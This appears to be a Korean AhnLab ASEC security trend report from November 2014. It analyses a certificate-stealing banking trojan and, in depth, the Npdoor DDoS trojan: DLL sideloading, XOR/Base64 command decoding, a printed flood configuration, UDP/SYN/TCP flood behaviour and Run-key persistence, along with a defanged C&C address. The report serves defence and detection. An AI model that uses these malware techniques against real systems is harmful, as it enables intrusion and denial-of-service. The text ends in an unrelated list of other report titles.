25 매우다양하다. 최근국내에서는사용자의금융관련정보를수집하고파밍사이트로유도하는기능을가진악성코드가다량으로유포되고있다. 또한매일같이변종까지유포되고있으나주요행위는대부분다음과같다. 1 공인인증서유출 - 공인인증서 (NPKI) 데이터압축파일을 HTTP POST 메소드를통해 C&C 서버로업로드 그림 2-26 공인인증서유출페이로드 (payload) 2 파밍사이트로사용자유도및금융정보탈취 - 이름 / 주민등록번호 / 계좌번호 / 계좌비밀번호 - 휴대전화번호 / 인터넷뱅킹 ID 및비밀번호 / 폰뱅킹비밀번호 / 인증서비밀번호 - 보안카드일련번호및모든데이터 그림 2-28 C&C 서버로사용자가입력한금융정보전송 마이크로소프트 (Microsoft) 는지난 11월보안패치 (MS14-064) 를통해해당취약점을해결하였다. 그러나해당패치를적용하지않은사용자가해당취약점에의해침해된사이트에접속할경우악성코드에감염될위험이존재한다. 그러므로이번취약점을비롯해최신취약점을이용해배포되는악성코드에감염되는것을방지하기위해사용자들은항상최신보안패치를적용하는데주의를기울여야한다. 또한웹사이트관리자들은지속적인모니터링을통해페이지내에의도하지않은스크립트가삽입되어있지않은지확인하는등경계를게을리해서는안된다. 한편 V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > Trojan/Win32.Banki 그림 2-27 파밍사이트로유도하는팝업창 ASEC REPORT 59 Security Trend 25
26 3 악성코드상세분석 Analysis-In-Depth 금융사이트보안솔루션으로위장한악성코드 ASEC REPORT 59 Security Trend
27 악성코드상세분석 Analysis-In-Depth 금융사이트보안솔루션으로위장한악성코드 최근국내주요보안업체의제품으로위장한악성코드가유포돼상당수은행사이트이용자들이감염된사례가발생했다. Trojan/Win32.Npdoor라는진단명의이악성코드는 2013년부터최근까지 10개의변종이발견되었다. 안랩의클라우드기반악성코드분석시스템의정보에따르면해당악성코드및변종은 2012년부터유포되었으나, 최초감염원인에대해서는아직알려진바없다. 해당악성코드의주요감염방식은 PlugX 형태이며, 주요기능은 DDoS 공격이다 (KernelBot 악성코드 ). 이보고서에서는 2013년 1월부터 2014년 10월까지수집된 Trojan/Win32.Npdoor의 10개변종중 2014년 10월 13일에수집된 xxupdateloc.dll 에대해상세히분석하고, 이를중심으로나머지 9개변종의동작방식과기능을비교하여살펴본다. 그림 3-1 Trojan/Win32.Npdoor 구성도 악성 xxupdateloc.dll은정상 xxupdate.exe 에로드되어실행된다. [ 그림 3-1] 의 1과같이 xxupdate.exe가실행되면 위성 DLL 기능 으로인해 파일이름 + loc.dll 형태의 dll 파일이자동으로로드된다. xxupdateloc.dll이자동으로로드되는이유는 MFC 버전 7.0이상에서 위성 DLL, 즉여러언어로지역화된응용프로그램을만들도록도와주는기능이지원되기때문이다. 동작방식 Trojan/Win32.Npdoor 변종중 xxupdateloc. dll 의악성행위를도식화하면 [ 그림 3-1] 과같다. 로드된 xxupdateloc.dll은특정보안업체제품이설치된환경인지파악하기위해 HKL- M Software xxxxxxxxxnet 키가존재하는지검사한다 ([ 그림 3-1] 의 2). 해당키가존재하면 OS 버전에따라각기다른위치에악성 xyupdate. ASEC REPORT 59 Security Trend 27
28 exe 파일을드롭하고실행한다 ([ 그림 3-1] 의 3). xyupdate.exe는 [ 그림 3-1] 의 4와같이 PlugX 방식으로정상 exe 파일, 악성 dll 파일, 암호화된악성데이터파일등 3개의파일을드롭하고실행한다. 이때실행된정상 exe 파일인 ctfmon.exe는 PlugX 동작방식과마찬가지로 libssp-0.dll을로드하고, 로드된 libssp-0.dll은 readme.txt를메모리로로드한후복호화하여실행한다. readme.txt가복호화되면악성 PE 파일이생성되어인터넷에접속하고명령을다운받아자기자신을업데이트하거나 DDoS 공격등의행위를한다 ([ 그림 3-1] 의 5). 그림 3-2 SecurityHelp 익스포트함수에서실행되는스레드와함수구성도 1. 업데이트및추가악성코드다운로드 (WrapSelfUpdateThread) [ 그림 3-1] 의 readme.txt는악성 PE 재구성코드, 악성 PE, C&C 주소등 3가지데이터로분류된다. libssp-0.dll은 readme.txt를자신과동일한메모리영역으로로드하고악성 PE 재구성코드를복호화하여실행한다. 실행된악성 PE 재구성코드는악성 PE와 C&C 주소를복호화한다. 이후 C&C 주소를악성 PE의 SecurityHelp 익스포트함수의인자로전달한다. SelfUpdateThread readme.txt 파일내부의복호화된악성 PE 파일은 SelfUpdateThread에서명령을다운로드하여이에따라동작한다. 명령을다운로드하는 C&C 주소는 SecurityHelp 익스포트함수가실행되면서받은인자에존재한다. 테스트시사용된 C&C 서버주소는 hxxp://wizapply.com/nisshin/ref.htm 이다. SecurityHelp 익스포트함수를포함해실행되는코드의전체적인구성도는 [ 그림 3-2] 와같다. [ 그림 3-2] 의 29개스레드와 2개의함수에대해자세히살펴보자. 이때각함수의이름은함수가수행하는기능을의미하는것으로, 특정 API 이름이나라이브러리함수의이름이아니다. C&C 주소를통해다운로드한명령은암호화되어있으며, 로둘러싸인데이터추출 추출한데이터를 Base64 로디코딩 디코딩한데이터를 XOR_Key(0x2A) 로 1Byte XOR - XOR_Key 는악성코드에하드코딩되어있으며, 일부변종의경우 0x7E 인경우도있음 ASEC REPORT 59 Security Trend 28
29 [ 그림 3-3] 은위와같은순서를거쳐복호화된명령으로, 악성코드가자기자신을업데이트하거나 DDoS 공격수행시참조한다. [KernelSetting] IsReportState=0 IsDownFileRun0=0 CmdID0=1 DownFileRunUrl0= [UpdateServer] NewVersion= UpdateFileUrl= [DDOS_HostStatistics] CountUrl= Timer=2 [DDOS_ScriptFlood] IsScriptFlood=0 CmdID=1 ScriptFloodDNS= ScriptFloodUrl= ScriptFloodPort=80 IsGetUrlFile=1 IsSendPacket=1 ThreadLoopTime=1 ThreadCount=1 Timer=20 IsTimer=1 [DDOS_ScriptFlood_A1] IsScriptFlood=0 CmdID=1 ScriptFloodDNS= ScriptFloodUrl= /1.html ScriptFloodPort=80 IsGetUrlFile=1 IsSendPacket=1 ThreadLoopTime=1 ThreadCount=1 Timer=20 IsTimer=1 [DDOS_UdpFlood] IsUdpFlood=0 CmdID=1 UdpFloodDNS= ThreadCount=1 Timer=20 IsTimer=1 [DDOS_UdpFlood_A1] IsUdpFlood=0 CmdID=1 UdpFloodDNS= ThreadCount=1 Timer=20 IsTimer=1 [DDOS_SynFlood] IsSynFlood=0 CmdID=1 SynFloodDNS= SynFloodPort=80 ThreadCount=1 Timer=20 IsTimer=1 [DDOS_TcpFlood] IsTcpFlood=0 CmdID=1 TcpFloodDNS= TcpFloodPort=80 IsSendPacket=1 ThreadCount=1 Timer=20 IsTimer=1 [DDOS_TcpFlood_A1] IsTcpFlood=0 CmdID=1 TcpFloodDNS= TcpFloodPort=80 IsSendPacket=1 ThreadCount=6 Timer=20 IsTimer=1 그림 3-3 복호화된명령 SelfUpdateThread는 [ 그림 3-3] 의 Update- Server 섹션과 DDOS_HostStatistics 섹션을참조한다. 또한 UpdateServer 섹션은 [ 그림 3-4] 와같이 NewVersion의값과 CurVersion( 현재파일 ASEC REPORT 59 Security Trend 29
30 의버전 ) 의값을비교한다. 페이지를요청한다 (GET 방식 ). 요청한페이지에는새로운 C&C 주소가있으며, 이새로운주소를현재사용하고있는 C&C 주소에업데이트한다. 페이지요청시에는 HTTP 리퍼러 (referrer) 값을복호화된 URL의도메인네임으로설정한다. DownloadXupdaterThread 그림 3-4 새버전과현재버전비교 이때 NewVersion의값이더상위버전이라면 [ 그림 3-5] 와같이 UpdateFileUrl 값에있는 URL의파일을 %USERPROFILE% readme.txt로다운로드한다. 그런다음현재버전에 NewVersion을덮어쓰는방식으로현재버전을업데이트한다. DownloadXupdaterThread는 [ 그림 3-3] 의 KernelSetting 섹션을참조한다. KernelSetting 섹션의 IsDownFileRun0 값이 1이면 DownFileRunUrl0 값을가져온다. DownFileRunUrl0 값은추가로다운로드할 xupdater.exe의 URL이다 ([ 그림 3-6]). 다운로드된 xupdater.exe는현재스레드에서실행되는것이아니라 MainThread의 ExecXupdater 함수에서실행된다. 그림 3-6 xupdater.exe 다운로드 그림 3-5 상위버전 readme.txt 다운로드및현재버전업데이트 C&C 주소에접속되지않을경우 DDOS_Host- Statistics 섹션의 CountUrl 값을참조한다. [ 그림 3-3] 에는 CountUrl 값이존재하지않지만하드코딩된 0x2A로 1Byte XOR되어있음을알수있다. 해당악성코드는 CountUrl 값을복호화후복호화한 URL의오른쪽에?type=get 파라미터를붙여 2. 컴퓨터정보전송 (SetTimerAndSendCompInfoThread) SetTimerAndSendCompInfoThread는 [ 그림 3-3] 의 DDOS_HostStatistics 섹션을참조하여컴퓨터정보를서버로전송한다. 해당섹션의타이머 (Timer) 값은 SetTimerAnd- SendCompInfoThread의전체코드가다시실행되는주기를결정한다 ( 단위 : 분 ). 타이머값이설정되어있지않으면 3분을기본값으로한다. ASEC REPORT 59 Security Trend 30
31 DDOS_HostStatistics 섹션에서 CountUrl 값은컴퓨터정보가전송될주소로, 해당주소는 0x2A로 1Byte XOR되어있다 ( 하드코딩된 XOR_ Key). 전송되는컴퓨터정보는 MAC 주소, 컴퓨터이름, OS 버전, CPU 브랜드명, 메모리사이즈 (gigabytes), 명령다운로드여부등이다. 이정보들은다음과같은순서를거쳐암호화되어 [ 그림 3-7] 과같은패킷형태로전송된다. 0x2A로 1Byte XOR Base64 인코딩 DDoS 메인스레드 ) 는실제공격을하는스레드 ( 이하 DDoS 서브스레드 ) 를생성한다. DDoS 서브스레드는복호화된명령 ([ 그림 3-3]) 에서공격대상주소, 공격주기등의정보를참조하여공격을수행한다. 해당악성코드에서는새로운 DDoS 공격기법은발견되지않았다. 한편, DDoS 메인스레드는동기화를위해 Sync 로시작하는스레드 ( 이하 DDoS 동기화스레드 ) 를생성한다. DDoS 동기화스레드는각섹션의타이머값만큼 ( 단위 : 분 ) 기다린다. 또한글로벌변수에 FALSE를설정하는데, 해당글로벌변수가 FALSE 가되면 DDoS 공격스레드는스스로종료한다. ScriptFloodThread ScriptFloodThread는 HTTP GET Flooding 공격을수행하는스레드로, DDOS_ScriptFlood 섹션을참조한다. 해당섹션의각값에대한의미는 [ 그림 3-8] 과같다. 그림 3-7 암호화된컴퓨터정보전송패킷 [ 그림 3-7] 의서버주소는테스트주소인 www. testserver.com/test.php이며, 암호화된컴퓨터정보는키파라미터 (key parameter) 로전송된다. 3. DDoS 공격 (DdosAttackThread) DdosAttackThread에서는 DDoS 공격을위해 6 개의스레드가생성된다. 생성되는 6개스레드 ( 이하 그림 3-8 DDOS_ScriptFlood 섹션값의미 - InternetReadFile4ScriptFloodThread InternetReadFile4ScriptFloodThread는 ScriptFloodUrl 값을참조하여 InternetOpenUrlW, InternetReadFile API를실행한다. [ 그림 3-9] 는 InternetOpenUrlW API ASEC REPORT 59 Security Trend 31
32 실행시전송하는패킷으로, no-cache로설정하여공격대상서버에부하를가중시킨다. 또한 InternetReadFile API 실행시에는버퍼에 7바이트만담도록한다. 그림 3-11 DDOS_UdpFlood 섹션값의미 그림 3-9 InternetOpenUrlW API 실행시전송하는패킷 - Sendto4UdpFloodThread Sendto4UdpFloodThread는 [ 그림 3-11] 의 UdpFloodDNS 값에있는주소에 k 문자를담은 8192 바이트크기의 UDP 패킷을전송한다. 패킷은 sendto 함수를사용하여전송되며, 이때전송되는패킷은 [ 그림 3-12] 와같다. - Send4ScriptFloodThread Send4ScriptFloodThread는 send 함수를사용하여 [ 그림 3-10] 과같은패킷을전송한다. 그림 3-12 sendto 함수로전송되는패킷 SynFloodThread SynFloodThread는 DDOS_SynFlood 섹션을참조한다. 해당섹션의각값에대한의미는 [ 그림 3-13] 과같다. 그림 3-10 send 함수로전송되는패킷 UdpFloodThread UdpFloodThread는 DDOS_UdpFlood 섹션을참조한다. 해당섹션의각값에대한의미는 [ 그림 3-11] 과같다. 그림 3-13 DDOS_SynFlood 섹션값의의미 - Sendto4SynFloodThread Sendto4SynFloodThread는 [ 그림 3-14] 와같 ASEC REPORT 59 Security Trend 32
33 이 sendto 함수의버퍼에 SYN 패킷 (IP header + TCP header) 을설정하고전송한다. IsSendPacket 값이 0 이면, [ 그림 3-17] 과같이 1~3 바이트의랜덤문자데이터를가진패킷이전송 된다. 그림 3-14 sendto 함수를이용한 SYN 패킷전송코드 TcpFloodThread TcpFloodThread는 DDOS_TcpFlood 섹션을참조한다. 해당섹션의각값에대한의미는 [ 그림 3-15] 와같다. 그림 3-15 DDOS_TcpFlood 섹션값의미 - Sendto4TcpFloodThread 전송되는패킷은 DDOS_TcpFlood 섹션의 IsSendPacket 값에따라달라진다. IsSendPacket 값이 1이면 send 함수에의해 [ 그림 3-16] 과같은패킷이전송된다. 그림 3-17 IsSendPacket이 0인경우전송되는패킷 ( 랜덤문자 1~3바이트 ) ScriptFloodA1Thread ScriptFloodA1Thread의기능은 Script- FloodThread와거의동일하나 IsGetUrlFile 값에의해 InternetReadFile4ScriptFloodA1T hread와 Send4ScriptFloodA1Thread의실행이결정된다는점이차이다. 즉, ScriptFlood- Thread는 IsGetUrlFile 값에상관없이 Send- 4ScriptFloodThread가실행된다. 반면 Script- FloodA1Thread는 IsGetUrlFile 값이 0이면 Send4ScriptFloodA1Thread만실행되고 1이면 InternetReadFile4ScriptFloodA1Thread 만실행된다. UdpFloodA1Thread UdpFloodA1Thread의기능은 UdpFlood- Thread와거의동일하다. 한가지차이는 Udp- FloodThread에서는전송하는데이터의사이즈가 0x2000 바이트이었지만 UdpFloodA1Thread에서는 0x1000 바이트로줄었다는점이다. 그림 3-16 IsSendPacket 이 1 인경우전송되는패킷 (k 문자 128 바이트 ) TcpFloodA1Thead TcpFloodA1Thread 의기능은 TcpFlood- ASEC REPORT 59 Security Trend 33
34 Thread의기능과동일하다. 4. 재실행을위한레지스트리 Run 키등록 (WrapRegRunValue) [ 그림 3-18] 과같이 MainThread에서악성코드를재실행하기위해레지스트리 Run 키에자기자신을등록한다. 그림 3-18 레지스트리 Run 키등록 5. xupdater.exe 실행 (ExecXupdater) DownloaderXupdaterThread에서다운로드 된 xupdater.exe는 [ 그림 3-19] 와같이 Main- Thread에서실행된다. 그림 3-19 xupdater.exe 실행 Trojan/Win32.Npdoor 악성코드및변종은동작방식에따라 exe 파일드롭 PlugX 드롭등으로구분할수있으며, 공격자계정추가 DDoS 공격 PlugX 등을수행한다. Trojan/Win32.Npdoor 악성코드와변종은 V3 제품군을이용해진단및치료할수있다. PlugX 형태로유포되는악성코드의피해를예방하기위해서는 V3를최신업데이트상태로유지하고 실시간검사 기능을활성화 (On 상태 ) 하는것이바람직하다. 또한신뢰할수없는웹페이지는접속하지않는습관이필요하다. ASEC REPORT 59 Security Trend 34
35 ASEC REPORT vol.59 November, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.
ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationSecurity Trend ASEC REPORT VOL.68 August, 2015
Security Trend ASEC REPORT VOL.68 August, 2015 ASEC REPORT VOL.68 August, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.76 April, 2016 ASEC REPORT VOL.76 April, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More informationASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서
Security Trend ASEC REPORT VOL.82 October, 2016 ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.81 September, 2016 ASEC REPORT VOL.81 September, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작
Security Trend ASEC REPORT VOL.80 August, 2016 ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC REPORT VOL.67 July, 2015
Security Trend ASEC REPORT VOL.67 July, 2015 ASEC REPORT VOL.67 July, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.58 October, 2014
Security Trend ASEC Report VOL.58 October, 2014 ASEC Report VOL.58 October, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며
Security Trend ASEC Report VOL.53 May, 2014 ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.63 March, 2015
Security Trend ASEC Report VOL.63 March, 2015 ASEC Report VOL.63 March, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성
Security Trend ASEC REPORT VOL.85 January, 2017 ASEC REPORT VOL.85 January, 2017 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며,
More informationASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.83 November, 2016 ASEC REPORT VOL.83 November, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationSecurity Trend ASEC REPORT VOL.70 October, 2015
Security Trend ASEC REPORT VOL.70 October, 2015 ASEC REPORT VOL.70 October, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC
Security Trend ASEC REPORT VOL.69 September, 2015 ASEC REPORT VOL.69 September, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationSecurity Trend ASEC Report VOL.52 April, 2014
Security Trend ASEC Report VOL.52 April, 2014 ASEC Report VOL.52 April, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.78 June, 2016 ASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC REPORT VOL.71 November, 2015 ASEC REPORT VOL.71 November, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More information월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호
안랩 온라인 보안 매거진 2016. 03 Patch Management System 월간 2016. 03 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호 법령 사항
More informationASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC REPORT VOL.75 March, 2016 ASEC REPORT VOL.75 March, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationSecurity Trend ASEC Report VOL.57 September, 2014
Security Trend ASEC Report VOL.57 September, 2014 ASEC Report VOL.57 September, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationSecurity Trend ASEC Report VOL.55 July, 2014
